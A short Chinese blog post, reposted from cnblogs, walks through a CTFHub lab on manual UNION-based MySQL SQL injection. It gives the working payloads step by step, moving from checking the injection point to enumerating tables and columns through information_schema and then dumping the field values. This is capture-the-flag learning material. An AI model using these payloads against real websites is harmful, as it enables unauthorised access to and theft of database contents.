阅读 64

CTFHub-mysql结构

手工注入

    输入1,发现存在两个注入点

 

 

    验证两个注入点:0 union select 1,2

 

 

    得到所使用的的数据库信息和版本信息:0 union select database(),version  (返回的字段数必须和注入点数量一致)

 

 

    通过数据库去查找表:0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli‘

 

 

    查询表中的字段:0 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘brqivopyay‘

 

    查询对应字段的值:0 union select 1,group_concat(ncrvswmjky) from brqivopyay

 

原文:https://www.cnblogs.com/r1kka/p/15180323.html
文章分类
代码人生
文章标签
ctfhub
mysql
结构
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐